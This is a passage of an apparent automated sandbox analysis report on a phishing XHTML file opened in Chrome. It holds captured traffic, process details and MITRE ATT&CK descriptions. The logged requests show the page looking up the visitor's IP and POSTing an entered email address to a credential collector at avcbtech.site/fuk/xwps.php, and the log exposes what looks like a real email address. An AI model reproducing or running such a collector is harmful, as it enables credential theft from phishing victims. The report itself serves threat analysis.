2025-03-24 13:45:05 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=1053166d9a151ce971da52999ae65248; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:45:05 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49775	104.26.12.205	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:05 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:45:05 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:05 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92569b63fe4141df-EWR server-timing: cfL4;desc="?proto=TCP&rtt=98475&min_rtt=97384&rtt_var=21505&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=38134&cwnd=238&unsent_bytes=0&cid=53647a650d62e92d&ts=250&x=0"
2025-03-24 13:45:05 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49776	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:06 UTC	441	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
2025-03-24 13:45:06 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:45:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49777	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:06 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:45:06 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:06 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92569b677ca3b785-EWR server-timing: cfL4;desc="?proto=TCP&rtt=98372&min_rtt=96735&rtt_var=22090&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=38473&cwnd=242&unsent_bytes=0&cid=6e75056abfefd5dd&ts=250&x=0"
2025-03-24 13:45:06 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49778	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:14 UTC	634	OUT	POST /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 24 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:45:14 UTC	24	OUT	Data Raw: 61 69 3d 61 70 70 6c 79 25 34 30 70 65 6f 2e 6f 6e 2e 63 61 26 70 72 3d Data Ascii: ai=apply%40peo.on.ca&pr=
2025-03-24 13:45:14 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:14 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=996b39300463b982a41b4cce18b71479; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:45:14 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49780	104.26.12.205	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:14 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:45:15 UTC	466	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:15 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92569b9ccb827b0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=100226&min_rtt=99568&rtt_var=21999&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=36671&cwnd=230&unsent_bytes=0&cid=009f4aafa82c15e3&ts=256&x=0"
2025-03-24 13:45:15 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49781	104.168.138.190	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:15 UTC	441	OUT	GET /fuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
2025-03-24 13:45:15 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:15 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 13:45:15 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49782	172.67.74.152	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:45:15 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:45:15 UTC	432	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 13:45:15 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92569b9f8904086e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96775&min_rtt=96179&rtt_var=20870&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=38693&cwnd=230&unsent_bytes=0&cid=0dd9b5ffcdf1636f&ts=248&x=0"
2025-03-24 13:45:15 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	1
Start time:	09:42:04
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	09:42:10
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,11596865098704793263,5756028737724251983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:3
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:42:15
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_VM-Now(apply)VWAV.xhtml"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Play_VM-Now(apply)VWAV.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Static File Info

General

Static OLE Info

General

OLE File "Play_VM-Now(apply)VWAV.xhtml"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Windows Analysis Report
Play_VM-Now(apply)VWAV.xhtml